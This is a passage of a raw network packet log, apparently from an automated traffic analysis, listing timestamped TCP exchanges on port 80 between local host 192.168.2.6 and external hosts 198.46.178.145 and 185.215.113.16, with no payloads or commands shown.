Jul 26, 2024 12:57:48.942723989 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.942739010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.942749023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.942771912 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.942776918 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.942804098 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.942812920 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.942837000 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.942868948 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.942890882 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.942902088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.942910910 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.942910910 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.942934990 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.942954063 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.942965984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.942979097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943001032 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943008900 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943044901 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943583012 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943615913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943633080 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943650007 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943654060 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943682909 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943691015 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943716049 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943738937 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943747997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943758965 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943780899 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943793058 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943814039 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943823099 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943846941 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943857908 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943880081 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943890095 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943913937 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.943922043 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.943963051 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944561005 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944616079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944633007 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944649935 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944657087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944684029 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944690943 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944716930 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944726944 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944750071 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944761992 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944783926 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944792986 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944818020 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944828033 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944850922 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944861889 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944884062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944894075 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944912910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944927931 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944946051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.944957018 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.944988966 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.945523024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.945558071 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.945574999 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.945590973 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.945599079 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.945624113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.945632935 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.945657969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.945667028 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.945691109 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.945703030 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.945723057 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.945734978 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.945755959 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.945766926 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.945789099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.945799112 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.945822001 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.945832014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.945854902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.945864916 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.945897102 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.946403027 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.946435928 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.946450949 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.946469069 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.946474075 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.946501970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.946507931 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.946535110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.946547031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.946568966 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.946578026 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.946600914 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.946610928 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.946633101 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.946641922 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.946665049 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.946676016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.946698904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.946707964 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.946732044 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.946743011 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.946774006 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.947010040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.947042942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.947071075 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.947077990 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.947130919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.947174072 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.975831985 CEST	60837	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:48.976120949 CEST	60838	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:48.981010914 CEST	80	60838	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:48.981079102 CEST	60838	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:48.981183052 CEST	60838	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:48.986167908 CEST	80	60838	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:48.991192102 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.991230011 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.991249084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.991266966 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.991274118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.991300106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.991307974 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.991333008 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.991338968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.991364956 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.991372108 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.991399050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.991404057 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.991442919 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.992734909 CEST	80	60837	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:48.992793083 CEST	60837	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:49.035053968 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035126925 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035131931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035180092 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035196066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035228014 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035238981 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035263062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035269976 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035303116 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035337925 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035372019 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035378933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035406113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035413027 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035444021 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035525084 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035557985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035576105 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035589933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035599947 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035623074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035634995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035656929 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035670996 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035691023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035702944 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035736084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.035959959 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.035993099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036007881 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036034107 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036147118 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036179066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036196947 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036211014 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036223888 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036245108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036253929 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036288023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036298037 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036340952 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036537886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036570072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036602974 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036624908 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036637068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036659956 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036669970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036681890 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036703110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036711931 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036744118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036750078 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036783934 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.036791086 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.036824942 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037204027 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037236929 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037254095 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037271023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037280083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037303925 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037312031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037337065 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037353992 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037369013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037375927 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037403107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037410021 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037435055 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037444115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037468910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037477016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037502050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037512064 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037538052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037543058 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037570000 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.037576914 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.037611961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038037062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038084984 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038088083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038120985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038130045 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038153887 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038160086 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038187981 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038194895 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038222075 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038228035 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038255930 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038263083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038290977 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038295984 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038322926 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038331032 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038357973 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038366079 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038398981 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038700104 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038733959 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038754940 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038775921 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038832903 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038866997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038875103 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038899899 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038916111 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038933039 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038945913 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.038965940 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.038974047 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039000988 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039009094 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039033890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039047956 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039067984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039081097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039100885 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039113998 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039135933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039146900 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039226055 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039674044 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039697886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039712906 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039721012 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039730072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039743900 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039745092 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039757967 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039761066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039777040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039783955 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039792061 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039804935 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039807081 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039824963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039830923 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039839983 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039850950 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039855003 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.039872885 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039886951 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.039899111 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040657043 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040673971 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040688038 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040704012 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040704012 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040714979 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040719032 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040733099 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040735006 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040741920 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040750027 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040760040 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040766001 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040771008 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040781975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040790081 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040797949 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040807009 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040812969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040824890 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040827990 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.040842056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040858030 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.040869951 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.041508913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.041524887 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.041538954 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.041553974 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.041554928 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.041567087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.041569948 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.041584015 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.041589022 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.041589975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.041610003 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.041610956 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.041611910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.041623116 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.041646957 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.041923046 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.041970968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.042000055 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.042043924 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.042100906 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.042115927 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.042129040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.042145014 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.042156935 CEST	60836	80	192.168.2.6	198.46.178.145
